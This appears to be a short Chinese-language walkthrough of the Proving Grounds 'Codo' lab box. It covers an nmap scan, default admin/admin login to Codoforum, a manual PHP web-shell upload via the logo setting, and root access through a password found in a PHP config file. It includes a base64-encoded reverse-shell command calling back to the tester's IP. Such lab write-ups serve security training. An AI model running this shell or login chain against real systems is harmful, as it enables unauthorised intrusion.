PG_Codo

信息收集：

root@iZt4nbifrvtk7cy11744y4Z:~# nmap -p- -Pn -A -sS -T4 192.168.164.23Starting Nmap 7.80 ( https://nmap.org ) at 2025-02-19 11:30 CSTNmap scan report for 192.168.164.23Host is up (0.0033s latency).Not shown: 65533 filtered portsPORT   STATE SERVICE VERSION22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))| http-cookie-flags: |   /: |     PHPSESSID: |_      httponly flag not set|_http-server-header: Apache/2.4.41 (Ubuntu)|_http-title: All topics | CODOLOGICWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed portAggressive OS guesses: Linux 2.6.32 (91%), Crestron XPanel control system (90%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.16 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%), Linux 2.6.39 - 3.2 (86%), Ubiquiti AirMax NanoStation WAP (Linux 2.6.32) (86%)No exact OS matches for host (test conditions non-ideal).Network Distance: 4 hopsService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTE (using port 80/tcp)HOP RTT     ADDRESS1   2.61 ms 192.168.45.12   2.59 ms 192.168.45.2543   2.83 ms 192.168.251.14   3.22 ms 192.168.164.23OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 100.68 seconds

除了ssh只有80的http，访问一下看看

searchsploit codoforum

有一个RCE漏洞，复制下来尝试发现需要账号密码，直接一手admin/admin成功进入系统

脚本输出上传失败了，手动试试

[-] Something went wrong, please try uploading the shell manually(admin panel > global settings > change forum logo > upload and access from http://192.168.164.23//sites/default/assets/img/attachments/[file.php])

成功

反弹shell

shell.php?shell=system('echo "c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC40NS4yMjIvMzAwMCAwPiYx" |base64 -d | bash');

SUID看了下提不了，上传执行linpeas.sh看

在PHP配置文件找到一个密码，尝试切换用户

尝试切换普通用户失败

切换root秒了